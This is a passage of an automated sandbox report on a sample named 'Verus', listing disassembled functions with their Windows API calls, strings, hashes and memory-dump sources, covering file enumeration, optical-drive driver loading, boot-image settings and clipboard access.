Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$FileFindlstrcmplstrcpylstrlen$lstrcat$CloseFirstModuleNameNext
String ID: *.irl$English (default)$Languages\
API String ID: 993335973-3777279215
Opcode ID: 39fbcaf903eca1c8f841a23d578a5bef5640b90491538d67188d8ec29c2553fa
Instruction ID: cbf10bdb20aa835938b7b0a03e4da427f410e83aebf2265c44a347060f17bf07
Opcode Fuzzy Hash: 39fbcaf903eca1c8f841a23d578a5bef5640b90491538d67188d8ec29c2553fa
Instruction Fuzzy Hash: AF5151B1204305ABD724DBA0EC95FABB3E9FBC8704F404E1DB69987181DB75E504CB69

Function 0045D260 Relevance: 33.2, APIs: 22, Instructions: 227stringfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,00000000,40000000,00000000,00000000), ref: 0045D2A8

Part of subcall function 00476FF0: lstrlenW.KERNEL32(?,?,0041F8B9,005394B4), ref: 00476FF6

lstrcpyW.KERNEL32(?,?), ref: 0045D2CA
lstrcatW.KERNEL32(?,004CA154), ref: 0045D2DF
lstrcpyW.KERNEL32(?,00000000), ref: 0045D2F2
lstrcatW.KERNEL32(?,00000000), ref: 0045D305
lstrcatW.KERNEL32(?,004CA150), ref: 0045D314
FindFirstFileW.KERNEL32(?,?), ref: 0045D323
lstrcmpW.KERNEL32(?,004C4DCC), ref: 0045D340
lstrcmpW.KERNEL32(?,004C4DC4), ref: 0045D358
lstrcpyW.KERNEL32(?,?), ref: 0045D37D
lstrcatW.KERNEL32(?,?), ref: 0045D38C

Part of subcall function 0045C0E0: lstrcpyW.KERNEL32(?,?,?,?), ref: 0045C1CC
Part of subcall function 0045C0E0: SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00000410), ref: 0045C1E4
Part of subcall function 0045C0E0: lstrcpyW.KERNEL32(?,004C49AC), ref: 0045C211
Part of subcall function 0045C0E0: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0045C21D
Part of subcall function 0045C0E0: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0045C23D

lstrcpyW.KERNEL32(?,?), ref: 0045D3C4
lstrcatW.KERNEL32(?,?), ref: 0045D3D3
FindNextFileW.KERNEL32(?,?), ref: 0045D421
lstrcmpW.KERNEL32(?,004C4DCC), ref: 0045D43A
lstrcmpW.KERNEL32(?,004C4DC4), ref: 0045D452
lstrcpyW.KERNEL32(?,?), ref: 0045D477
lstrcatW.KERNEL32(?,?), ref: 0045D486
lstrcpyW.KERNEL32(?,?), ref: 0045D4BE
lstrcatW.KERNEL32(?,?), ref: 0045D4CD
FindNextFileW.KERNEL32(?,?), ref: 0045D51B
FindClose.KERNEL32(?), ref: 0045D52E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$Filelstrcat$FindTimelstrcmp$Next$CloseDateFirstInfoLocallstrlen
String ID:
API String ID: 2548518239-0
Opcode ID: 9ab5557284497c4fc9cf9e4342cb783f5952a90f2cc73e37ddd19270e176a12d
Instruction ID: 13009c06c4fddbca0bd6a5475153a6546fa335df1703b8f9f4f24638adb8e6ae
Opcode Fuzzy Hash: 9ab5557284497c4fc9cf9e4342cb783f5952a90f2cc73e37ddd19270e176a12d
Instruction Fuzzy Hash: 85812172108345ABC724DFA4D895DEBB3E9BFC8304F408E2EB59683141EB74E508CB66

Function 0042E530 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 270synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042EB29
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042EBAA
ResetEvent.KERNEL32(00000000), ref: 0042EBB3
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0000005C,00000000,?,?,?), ref: 0042EBD1
CloseHandle.KERNEL32(00000000,?,00000000,0000005C,00000000,?,?,?), ref: 0042EBD8
_memset.LIBCMT ref: 0042F01E
DeviceIoControl.KERNEL32(?,0004D014,?,00000050,?,00000050,?,00000000), ref: 0042F0CB
GetLastError.KERNEL32 ref: 0042F0DA

Strings

DeviceIoControl failed, last error: %d., xrefs: 0042F0E1
H, xrefs: 0042EB9D
0, xrefs: 0042F04B
<, xrefs: 0042F06A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Event_memset$CloseControlCreateDeviceErrorHandleLastObjectResetSingleWait
String ID: DeviceIoControl failed, last error: %d.$0$<$H
API String ID: 1385871642-3097556771
Opcode ID: 15545bd365b6c4d9a08339a443b35b0da713999fb37c8d6bbb45ee33093adb91
Instruction ID: 2bbe123abcb625b44b3fce3820478d5bf03bb2b29ab6a630cc4947f01ea95e35
Opcode Fuzzy Hash: 15545bd365b6c4d9a08339a443b35b0da713999fb37c8d6bbb45ee33093adb91
Instruction Fuzzy Hash: 2DA19E716083419FD310CF29D841B6BFBE0BB99314F848A2EF59983392D779E848CB56

Function 00456840 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,AD5E0258,?,?,?,00000000), ref: 00456858
SizeofResource.KERNEL32(00000000,00000000,?,?,AD5E0258,?,?,?,00000000), ref: 00456872
LoadResource.KERNEL32(00000000,00000000,?,AD5E0258,?,?,?,00000000), ref: 0045687D
LockResource.KERNEL32(00000000,?,AD5E0258,?,?,?,00000000), ref: 0045688A

Strings

1.2.33, xrefs: 004568A5
PNG, xrefs: 0045684A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: 1.2.33$PNG
API String ID: 3473537107-3609450932
Opcode ID: 4b0d426a9aa06da24305b8c469fb276feb36aa0d6fe131e7e3d257419cf82d37
Instruction ID: 5681c8fad5f743a449a858fa6c1305411c013bab3e274a0031adab80e329b0c3
Opcode Fuzzy Hash: 4b0d426a9aa06da24305b8c469fb276feb36aa0d6fe131e7e3d257419cf82d37
Instruction Fuzzy Hash: F251CE715443009FC310DF29C845B67BBE8AF95705F18856EF9889B362E631D849CB95

Function 0042E6D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wnaspi32.dll,?,0042E76E,?,0042E657,?,?,?,AD5E0258,?,-00000048,00415B00), ref: 0042E6D8
GetProcAddress.KERNEL32(00000000,GetASPI32SupportInfo), ref: 0042E707
GetProcAddress.KERNEL32(00000000,SendASPI32Command), ref: 0042E718

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

Strings

Error: Unable to load ASPI driver, wnaspi32.dll could not be loaded., xrefs: 0042E6E4
GetASPI32SupportInfo, xrefs: 0042E701
wnaspi32.dll, xrefs: 0042E6D1
SendASPI32Command, xrefs: 0042E712
Error: Unable to load ASPI driver, status code 0x%.2X., xrefs: 0042E73B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$AddressLengthProcText$LibraryLoad_vswprintf_slstrlen
String ID: Error: Unable to load ASPI driver, status code 0x%.2X.$ Error: Unable to load ASPI driver, wnaspi32.dll could not be loaded.$GetASPI32SupportInfo$SendASPI32Command$wnaspi32.dll
API String ID: 1897914742-2860373846
Opcode ID: ff2966849ccaffa69c9fdb379c8ecb803c2be87104904b4411aaacd6a63c3832
Instruction ID: cd1f6415eadfc893284ec01600164a49f4458d7da01d9df767fd22620f36fc7f
Opcode Fuzzy Hash: ff2966849ccaffa69c9fdb379c8ecb803c2be87104904b4411aaacd6a63c3832
Instruction Fuzzy Hash: D701267574431227CB702B6ABC02F97B7E8AFB1701B58046FF840D2390DDACE8858A68

Function 0045CB70 Relevance: 10.2, Strings: 8, Instructions: 163COMMON

Download Yara Rule

Strings

Images, xrefs: 0045CB9C
LoadSegment, xrefs: 0045CCFE
Emulation, xrefs: 0045CCE1
FullPath, xrefs: 0045CC6C
LoadSize, xrefs: 0045CD0E
Boot, xrefs: 0045CB8C
NoBoot, xrefs: 0045CCEE
LocalName, xrefs: 0045CCAA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _malloclstrcmp
String ID: Boot$Emulation$FullPath$Images$LoadSegment$LoadSize$LocalName$NoBoot
API String ID: 3500471182-1144869248
Opcode ID: 151294eac4d07f0ce06dde91ae60b1cf0fc4112eeaf175f3f5d31b94d20eb21d
Instruction ID: d7738bdd98f6164eaee0915b8653525efb8673a483ac2dbfaf63fc632ccc8d27
Opcode Fuzzy Hash: 151294eac4d07f0ce06dde91ae60b1cf0fc4112eeaf175f3f5d31b94d20eb21d
Instruction Fuzzy Hash: F751E2712042059FCB18EF22C856EEF7795AB94708F04851FE5094B293DF7DA909C79E

Function 00B6C106 Relevance: 10.2, Strings: 8, Instructions: 156COMMON

Download Yara Rule

Strings

+, xrefs: 00B6C262
(, xrefs: 00B6C26A
(, xrefs: 00B6C13B
*, xrefs: 00B6C12B
+, xrefs: 00B6C133
*, xrefs: 00B6C25A
%, xrefs: 00B6C123
%, xrefs: 00B6C252

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
Instruction ID: 3bb19acb266be97aa4842e4bfac53677543442ac7fd89c2e812b4fba65d594df
Opcode Fuzzy Hash: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
Instruction Fuzzy Hash: 3851197164C3D08BD7298A74D8E53BB7FD1EB92314F1888ADD5CA97382C67D8841C746

Function 00B6E106 Relevance: 10.2, Strings: 8, Instructions: 153COMMON

Download Yara Rule

Strings

(, xrefs: 00B6E133
%, xrefs: 00B6E11B
%, xrefs: 00B6E24A
+, xrefs: 00B6E25A
*, xrefs: 00B6E123
(, xrefs: 00B6E262
*, xrefs: 00B6E252
+, xrefs: 00B6E12B

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: %$%$($($*$*$+$+
API String ID: 0-157184678
Opcode ID: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
Instruction ID: da73243fac2bd82467ad27be56d0997adc365cbe8af239f078c7e3ab0869fbfe
Opcode Fuzzy Hash: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
Instruction Fuzzy Hash: 4651387954C3D0CFD3258A64D8F63EBBBD1AB96304F1888ADC5DA97382C67D84418746

Function 0045C7B0 Relevance: 9.1, APIs: 6, Instructions: 134timestringwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004593F0: lstrlenW.KERNEL32(00000000,00000000), ref: 0045943D
Part of subcall function 004593F0: _wcsncpy.LIBCMT ref: 0045945A
Part of subcall function 004593F0: lstrcatW.KERNEL32(?, (%u),?), ref: 00459485

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00000410), ref: 0045C88F
lstrcpyW.KERNEL32(?,004C49AC), ref: 0045C8BC
GetLocalTime.KERNEL32(?), ref: 0045C8C7
SystemTimeToFileTime.KERNEL32(?,?), ref: 0045C8D7
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0045C8F2
SendMessageW.USER32(?,00001102,00000002,?), ref: 0045C94D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Time$File$DateInfoLocalMessageSendSystem_malloc_wcsncpylstrcatlstrcpylstrlen
String ID:
API String ID: 3864599917-0
Opcode ID: df36c58b255de156f449502fcf4580043136051017bb0231736c142f7dc10612
Instruction ID: 4a6d5ffb19953ee657035b744a6940dcca6cf290f6af1477ea1f80c7184f6821
Opcode Fuzzy Hash: df36c58b255de156f449502fcf4580043136051017bb0231736c142f7dc10612
Instruction Fuzzy Hash: B241C3B1204305AFD314DF55D995FABB7E9FBC8704F00492EF54587291EB78A804CB9A

Function 004468C0 Relevance: 9.1, APIs: 6, Instructions: 79clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 004468FF
IsClipboardFormatAvailable.USER32(0000000F), ref: 0044690F
GetClipboardData.USER32(0000000F), ref: 0044691B
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00446945
DragQueryFileW.SHELL32(00000000,00000000,?,00000103), ref: 0044695C
CloseClipboard.USER32 ref: 0044698B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Clipboard$DragFileQuery$AvailableCloseDataFormatOpen
String ID:
API String ID: 587474457-0
Opcode ID: dbe94592ae79155210bf67489d338892d3a547ef3edda52f3e4ec65014cd762f
Instruction ID: 213c9e318b1f6b1190a5dcca95b328145ed49c8eb0f0e0eabe8e7f4fb051c255
Opcode Fuzzy Hash: dbe94592ae79155210bf67489d338892d3a547ef3edda52f3e4ec65014cd762f
Instruction Fuzzy Hash: BE21B571204741AFD320DB65DC45FABBBE8EFC9B20F11463EB959822D1DB749804CB6A

Function 00418DA0 Relevance: 8.7, APIs: 5, Instructions: 1214stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004BE3C0: GetTempPathW.KERNEL32(000000F6,?), ref: 004BE401
Part of subcall function 004BE3C0: GetTempFileNameW.KERNEL32(?,tmp,00000000,?), ref: 004BE41C

lstrlenW.KERNEL32(00000000), ref: 00418EA7
SetWindowTextW.USER32(?,00000000), ref: 00418F04

Part of subcall function 00456FB0: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456FE4
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FF5
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FFF
Part of subcall function 00456FB0: _wcsncat.LIBCMT ref: 0045700C
Part of subcall function 00456FB0: SetDlgItemTextW.USER32(?,000003EF,?), ref: 00457030

Part of subcall function 00456C60: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456C91
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CA2
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CB3
Part of subcall function 00456C60: _wcsncat.LIBCMT ref: 00456CC7
Part of subcall function 00456C60: _vswprintf_s.LIBCMT ref: 00456CFA

Part of subcall function 00457630: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0045765C
Part of subcall function 00457630: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00415EAB,005391F0,00000001,00000000), ref: 00457665

Part of subcall function 00456C60: lstrcatW.KERNEL32(?,?), ref: 00456CDE

SetWindowTextW.USER32(?,00000000), ref: 00419058
lstrlenW.KERNEL32(00000000), ref: 004194A7
SetWindowTextW.USER32(?,00000000), ref: 00419A13

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$Text$Window$Temp_wcsncatlstrcpy$FileItemLocalMessageNamePathSendTime_vswprintf_slstrcat
String ID:
API String ID: 1133364188-0
Opcode ID: 531e2b9d1295bc31c65d948cf601aca0a6f46986eeac6f64c8f65d1292dcbdd7
Instruction ID: 5683df82a294af83999940152e95deb6ecbcf51d36fbf89cd20fa5a5416e0840
Opcode Fuzzy Hash: 531e2b9d1295bc31c65d948cf601aca0a6f46986eeac6f64c8f65d1292dcbdd7
Instruction Fuzzy Hash: 1BA215B0608341AFD324EB65C892BEF77D9AF94304F00491EF58657392DA78AD44CB6B

Function 004911AA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0049775B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00497770
UnhandledExceptionFilter.KERNEL32(004D589C), ref: 0049777B
GetCurrentProcess.KERNEL32(C0000409), ref: 00497797
TerminateProcess.KERNEL32(00000000), ref: 0049779E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 17a279d7b2601bedefdb16d259f815f3257d7770b021d64a09265f7af50dea9f
Instruction ID: c9d64225c158b4b95e577fb8d3a52e836368e943707570bd88053fe2ba4e0e10
Opcode Fuzzy Hash: 17a279d7b2601bedefdb16d259f815f3257d7770b021d64a09265f7af50dea9f
Instruction Fuzzy Hash: F521F5B8510301DFCB50DF69FD49A487BB4FB68304F00486AF48887361EBB45989EF5A

Function 0044D0E0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0044D104
IsIconic.USER32(?), ref: 0044D118
IsZoomed.USER32(?), ref: 0044D126
GetWindowRect.USER32(?,004EE92C), ref: 0044D13D
IsZoomed.USER32(?), ref: 0044D147

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: WindowZoomed$IconicRectVisible
String ID:
API String ID: 3100326370-0
Opcode ID: 4c3ede4b599e97203081ec44c1f636346cac3116092b791cbfa693d74486b8a0
Instruction ID: e5a6a84c71715aae520f9784e084a62e3de0702fa2f7559b5fe96f2079edf330
Opcode Fuzzy Hash: 4c3ede4b599e97203081ec44c1f636346cac3116092b791cbfa693d74486b8a0
Instruction Fuzzy Hash: 98018F766043405BEB209FB5ED40F57B7E5AFD4740F00891FE84187252C7B9E841CB68

Function 004788E0 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

APIs

Part of subcall function 00477A50: _memset.LIBCMT ref: 00477A6D

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

